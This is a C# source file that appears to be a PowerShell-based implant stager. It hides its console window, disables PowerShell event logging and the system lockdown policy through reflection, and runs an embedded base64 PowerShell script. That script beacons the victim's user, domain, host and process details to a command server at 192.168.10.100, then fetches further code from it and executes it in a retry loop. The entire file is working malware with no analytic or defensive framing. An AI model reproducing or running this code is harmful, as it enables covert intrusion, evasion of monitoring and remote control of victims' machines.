using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using Microsoft.PowerShell;
using System.Reflection;
using System.Management.Automation;
using System.Management.Automation.Security;
using System.Management.Automation.Runspaces;
using System.Runtime.InteropServices;

[ComVisible(true)]
public class Program
{
    [DllImport("kernel32.dll")]
    static extern IntPtr GetConsoleWindow();
    [DllImport("user32.dll")]
    static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);

    public const int SW_HIDE = 0;
    public const int SW_SHOW = 5;

    public Program()
    {
        try
        {

            string Command = System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String("WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAAoAJABzAD0AIgBoAHQAdABwAHMAOgAvAC8AMQA5ADIALgAxADYAOAAuADEAMAAuADEAMAAwADoANAA0ADMALwBjAG8AbgBuAGUAYwB0ACIACgBmAHUAbgBjAHQAaQBvAG4AIABHAGUAdAAtAFcAZQBiAGMAbABpAGUAbgB0ACAAKAAkAEMAbwBvAGsAaQBlACkAIAB7AAoAJABkACAAPQAgACgARwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgACIAZABkAC8ATQBNAC8AeQB5AHkAeQAiACkAOwAKACQAZAAgAD0AIABbAGQAYQB0AGUAdABpAG0AZQBdADoAOgBQAGEAcgBzAGUARQB4AGEAYwB0ACgAJABkACwAIgBkAGQALwBNAE0ALwB5AHkAeQB5ACIALAAkAG4AdQBsAGwAKQA7AAoAJABrACAAPQAgAFsAZABhAHQAZQB0AGkAbQBlAF0AOgA6AFAAYQByAHMAZQBFAHgAYQBjAHQAKAAiADIANQAvADAAMQAvADIAMAAxADgAIgAsACIAZABkAC8ATQBNAC8AeQB5AHkAeQAiACwAJABuAHUAbABsACkAOwAKAGkAZgAgACgAJABrACAALQBsAHQAIAAkAGQAKQAgAHsAZQB4AGkAdAB9ACAACgAkAHUAcwBlAHIAbgBhAG0AZQAgAD0AIAAiACIACgAkAHAAYQBzAHMAdwBvAHIAZAAgAD0AIAAiACIACgAkAHAAcgBvAHgAeQB1AHIAbAAgAD0AIAAiACIACgAkAHcAYwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAKAAoAJABoAD0AIgAiAAoAaQBmACAAKAAkAGgAIAAtAGEAbgBkACAAKAAoACQAcABzAHYAZQByAHMAaQBvAG4AdABhAGIAbABlAC4AQwBMAFIAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwB0ACAAMgApACkAKQAgAHsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAEgAbwBzAHQAIgAsACQAaAApAH0ACgBlAGwAcwBlAGkAZgAoACQAaAApAHsAJABzAGMAcgBpAHAAdAA6AHMAPQAiAGgAdAB0AHAAcwA6AC8ALwAkACgAJABoACkALwBjAG8AbgBuAGUAYwB0ACIAfQAKACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgBVAHMAZQByAC0AQQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAzADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAVABvAHUAYwBoADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACIAKQAKACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgBSAGUAZgBlAHIAZQByACIALAAiAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGcAbwBvAGcAbABlAC4AYwBvAG0AIgApAAoAaQBmACAAKAAkAHAAcgBvAHgAeQB1AHIAbAApACAAewAKACQAdwBwACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUAByAG8AeAB5ACgAJABwAHIAbwB4AHkAdQByAGwALAAkAHQAcgB1AGUAKQA7ACAACgBpAGYAIAAoACQAdQBzAGUAcgBuAGEAbQBlACAALQBhAG4AZAAgACQAcABhAHMAcwB3AG8AcgBkACkAIAB7AAoAJABQAFMAUwAgAD0AIABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAAJABwAGEAcwBzAHcAbwByAGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlADsAIAAKACQAZwBlAHQAYwByAGUAZABzACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABzAHkAcwB0AGUAbQAuAG0AYQBuAGEAZwBlAG0AZQBuAHQALgBhAHUAdABvAG0AYQB0AGkAbwBuAC4AUABTAEMAcgBlAGQAZQBuAHQAaQBhAGwAIAAkAHUAcwBlAHIAbgBhAG0AZQAsACQAUABTAFMAOwAgAAoAJAB3AHAALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAJABnAGUAdABjAHIAZQBkAHMAOwAKAH0AIABlAGwAcwBlACAAewAgACQAdwBjAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAJAB0AHIAdQBlADsAIAB9AAoAJAB3AGMALgBQAHIAbwB4AHkAIAA9ACAAJAB3AHAAOwAgAH0AIABlAGwAcwBlACAAewAgAAoAJAB3AGMALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AIAAkAHQAcgB1AGUAOwAgAAoAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAJAB3AGMALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOwAKAH0AIABpAGYAIAAoACQAYwBvAG8AawBpAGUAKQAgAHsAIAAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEgAdAB0AHAAUgBlAHEAdQBlAHMAdABIAGUAYQBkAGUAcgBdADoAOgBDAG8AbwBrAGkAZQAsACAAIgBTAGUAcwBzAGkAbwBuAEkARAA9ACQAQwBvAG8AawBpAGUAIgApACAAfQAKACQAdwBjACAAfQAgAGYAdQBuAGMAdABpAG8AbgAgAHAAcgBpAG0AZQByACAAewAKAGkAZgAgACgAJABlAG4AdgA6AHUAcwBlAHIAbgBhAG0AZQAgAC0AZQBxACAAIgAkACgAJABlAG4AdgA6AGMAbwBtAHAAdQB0AGUAcgBuAGEAbQBlACkAJAAiACkAewAkAHUAPQAiAE4AVAAgAEEAVQBUAEgATwBSAEkAVABZAFwAUwBZAFMAVABFAE0AIgB9AGUAbABzAGUAewAkAHUAPQAkAGUAbgB2ADoAdQBzAGUAcgBuAGEAbQBlAH0ACgAkAHAAcgBlAHQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACIAJABlAG4AdgA6AHUAcwBlAHIAZABvAG0AYQBpAG4AXAAkAHUAOwAkAHUAOwAkAGUAbgB2ADoAYwBvAG0AcAB1AHQAZQByAG4AYQBtAGUAOwAkAGUAbgB2ADoAUABSAE8AQwBFAFMAUwBPAFIAXwBBAFIAQwBIAEkAVABFAEMAVABVAFIARQA7ACQAcABpAGQAOwBoAHQAdABwAHMAOgAvAC8AMQA5ADIALgAxADYAOAAuADEAMAAuADEAMAAwACIAKQAKACQAcAByAGUAdABlAHgAdAA2ADQAIAA9ACAAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcAByAGUAdABlAHgAdAApAAoAJABwAHIAaQBtAGUAcgAgAD0AIAAoAEcAZQB0AC0AVwBlAGIAYwBsAGkAZQBuAHQAIAAtAEMAbwBvAGsAaQBlACAAJABwAHIAZQB0AGUAeAB0ADYANAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJABzACkACgAkAHAAcgBpAG0AZQByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHAAcgBpAG0AZQByACkAKQAKACQAcAByAGkAbQBlAHIAIAB9ACAACgAkAHAAcgBpAG0AZQByACAAPQAgAHAAcgBpAG0AZQByAAoAaQBmACAAKAAkAHAAcgBpAG0AZQByACkAIAB7ACQAcAByAGkAbQBlAHIAfAAgAGkAZQB4AH0AIABlAGwAcwBlACAAewAKAHMAdABhAHIAdAAtAHMAbABlAGUAcAAgADEAMgAwAAoAcAByAGkAbQBlAHIAIAB8ACAAaQBlAHgAIAB9AA=="));

            using (PowerShell powerShellInstance = PowerShell.Create())
            {
                var psEtwLogProvider = powerShellInstance.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider");
                if (psEtwLogProvider != null)
                {
                    var etwProvider = psEtwLogProvider.GetField("etwProvider", BindingFlags.NonPublic | BindingFlags.Static);
                    var eventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
                    etwProvider.SetValue(null, eventProvider);
                }

                var fi = typeof(SystemPolicy).GetField("systemLockdownPolicy", BindingFlags.NonPublic | BindingFlags.Static);
                fi.SetValue(null, SystemEnforcementMode.None);

                powerShellInstance.AddScript(Command);
                powerShellInstance.Invoke();
            }
        }

        catch
        {
            Main();
        }
    }
        public static void Main()
        {
            try
            {
                var handle = GetConsoleWindow();
                ShowWindow(handle, SW_HIDE);

                string Command = System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String("WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAAoAJABzAD0AIgBoAHQAdABwAHMAOgAvAC8AMQA5ADIALgAxADYAOAAuADEAMAAuADEAMAAwADoANAA0ADMALwBjAG8AbgBuAGUAYwB0ACIACgBmAHUAbgBjAHQAaQBvAG4AIABHAGUAdAAtAFcAZQBiAGMAbABpAGUAbgB0ACAAKAAkAEMAbwBvAGsAaQBlACkAIAB7AAoAJABkACAAPQAgACgARwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgACIAZABkAC8ATQBNAC8AeQB5AHkAeQAiACkAOwAKACQAZAAgAD0AIABbAGQAYQB0AGUAdABpAG0AZQBdADoAOgBQAGEAcgBzAGUARQB4AGEAYwB0ACgAJABkACwAIgBkAGQALwBNAE0ALwB5AHkAeQB5ACIALAAkAG4AdQBsAGwAKQA7AAoAJABrACAAPQAgAFsAZABhAHQAZQB0AGkAbQBlAF0AOgA6AFAAYQByAHMAZQBFAHgAYQBjAHQAKAAiADIANQAvADAAMQAvADIAMAAxADgAIgAsACIAZABkAC8ATQBNAC8AeQB5AHkAeQAiACwAJABuAHUAbABsACkAOwAKAGkAZgAgACgAJABrACAALQBsAHQAIAAkAGQAKQAgAHsAZQB4AGkAdAB9ACAACgAkAHUAcwBlAHIAbgBhAG0AZQAgAD0AIAAiACIACgAkAHAAYQBzAHMAdwBvAHIAZAAgAD0AIAAiACIACgAkAHAAcgBvAHgAeQB1AHIAbAAgAD0AIAAiACIACgAkAHcAYwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAKAAoAJABoAD0AIgAiAAoAaQBmACAAKAAkAGgAIAAtAGEAbgBkACAAKAAoACQAcABzAHYAZQByAHMAaQBvAG4AdABhAGIAbABlAC4AQwBMAFIAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwB0ACAAMgApACkAKQAgAHsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAEgAbwBzAHQAIgAsACQAaAApAH0ACgBlAGwAcwBlAGkAZgAoACQAaAApAHsAJABzAGMAcgBpAHAAdAA6AHMAPQAiAGgAdAB0AHAAcwA6AC8ALwAkACgAJABoACkALwBjAG8AbgBuAGUAYwB0ACIAfQAKACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgBVAHMAZQByAC0AQQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAzADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAVABvAHUAYwBoADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACIAKQAKACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgBSAGUAZgBlAHIAZQByACIALAAiAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGcAbwBvAGcAbABlAC4AYwBvAG0AIgApAAoAaQBmACAAKAAkAHAAcgBvAHgAeQB1AHIAbAApACAAewAKACQAdwBwACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUAByAG8AeAB5ACgAJABwAHIAbwB4AHkAdQByAGwALAAkAHQAcgB1AGUAKQA7ACAACgBpAGYAIAAoACQAdQBzAGUAcgBuAGEAbQBlACAALQBhAG4AZAAgACQAcABhAHMAcwB3AG8AcgBkACkAIAB7AAoAJABQAFMAUwAgAD0AIABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAAJABwAGEAcwBzAHcAbwByAGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlADsAIAAKACQAZwBlAHQAYwByAGUAZABzACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABzAHkAcwB0AGUAbQAuAG0AYQBuAGEAZwBlAG0AZQBuAHQALgBhAHUAdABvAG0AYQB0AGkAbwBuAC4AUABTAEMAcgBlAGQAZQBuAHQAaQBhAGwAIAAkAHUAcwBlAHIAbgBhAG0AZQAsACQAUABTAFMAOwAgAAoAJAB3AHAALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAJABnAGUAdABjAHIAZQBkAHMAOwAKAH0AIABlAGwAcwBlACAAewAgACQAdwBjAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAJAB0AHIAdQBlADsAIAB9AAoAJAB3AGMALgBQAHIAbwB4AHkAIAA9ACAAJAB3AHAAOwAgAH0AIABlAGwAcwBlACAAewAgAAoAJAB3AGMALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AIAAkAHQAcgB1AGUAOwAgAAoAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAJAB3AGMALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOwAKAH0AIABpAGYAIAAoACQAYwBvAG8AawBpAGUAKQAgAHsAIAAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEgAdAB0AHAAUgBlAHEAdQBlAHMAdABIAGUAYQBkAGUAcgBdADoAOgBDAG8AbwBrAGkAZQAsACAAIgBTAGUAcwBzAGkAbwBuAEkARAA9ACQAQwBvAG8AawBpAGUAIgApACAAfQAKACQAdwBjACAAfQAgAGYAdQBuAGMAdABpAG8AbgAgAHAAcgBpAG0AZQByACAAewAKAGkAZgAgACgAJABlAG4AdgA6AHUAcwBlAHIAbgBhAG0AZQAgAC0AZQBxACAAIgAkACgAJABlAG4AdgA6AGMAbwBtAHAAdQB0AGUAcgBuAGEAbQBlACkAJAAiACkAewAkAHUAPQAiAE4AVAAgAEEAVQBUAEgATwBSAEkAVABZAFwAUwBZAFMAVABFAE0AIgB9AGUAbABzAGUAewAkAHUAPQAkAGUAbgB2ADoAdQBzAGUAcgBuAGEAbQBlAH0ACgAkAHAAcgBlAHQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACIAJABlAG4AdgA6AHUAcwBlAHIAZABvAG0AYQBpAG4AXAAkAHUAOwAkAHUAOwAkAGUAbgB2ADoAYwBvAG0AcAB1AHQAZQByAG4AYQBtAGUAOwAkAGUAbgB2ADoAUABSAE8AQwBFAFMAUwBPAFIAXwBBAFIAQwBIAEkAVABFAEMAVABVAFIARQA7ACQAcABpAGQAOwBoAHQAdABwAHMAOgAvAC8AMQA5ADIALgAxADYAOAAuADEAMAAuADEAMAAwACIAKQAKACQAcAByAGUAdABlAHgAdAA2ADQAIAA9ACAAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcAByAGUAdABlAHgAdAApAAoAJABwAHIAaQBtAGUAcgAgAD0AIAAoAEcAZQB0AC0AVwBlAGIAYwBsAGkAZQBuAHQAIAAtAEMAbwBvAGsAaQBlACAAJABwAHIAZQB0AGUAeAB0ADYANAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJABzACkACgAkAHAAcgBpAG0AZQByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHAAcgBpAG0AZQByACkAKQAKACQAcAByAGkAbQBlAHIAIAB9ACAACgAkAHAAcgBpAG0AZQByACAAPQAgAHAAcgBpAG0AZQByAAoAaQBmACAAKAAkAHAAcgBpAG0AZQByACkAIAB7ACQAcAByAGkAbQBlAHIAfAAgAGkAZQB4AH0AIABlAGwAcwBlACAAewAKAHMAdABhAHIAdAAtAHMAbABlAGUAcAAgADEAMgAwAAoAcAByAGkAbQBlAHIAIAB8ACAAaQBlAHgAIAB9AA=="));

                using (PowerShell powerShellInstance = PowerShell.Create())
                {
                    var psEtwLogProvider = powerShellInstance.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider");
                    if (psEtwLogProvider != null)
                    {
                        var etwProvider = psEtwLogProvider.GetField("etwProvider", BindingFlags.NonPublic | BindingFlags.Static);
                        var eventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
                        etwProvider.SetValue(null, eventProvider);
                    }

                    var fi = typeof(SystemPolicy).GetField("systemLockdownPolicy", BindingFlags.NonPublic | BindingFlags.Static);
                    fi.SetValue(null, SystemEnforcementMode.None);

                    powerShellInstance.AddScript(Command);
                    powerShellInstance.Invoke();
                }
            }

            catch
            {
                Main();
            }
        }
    }
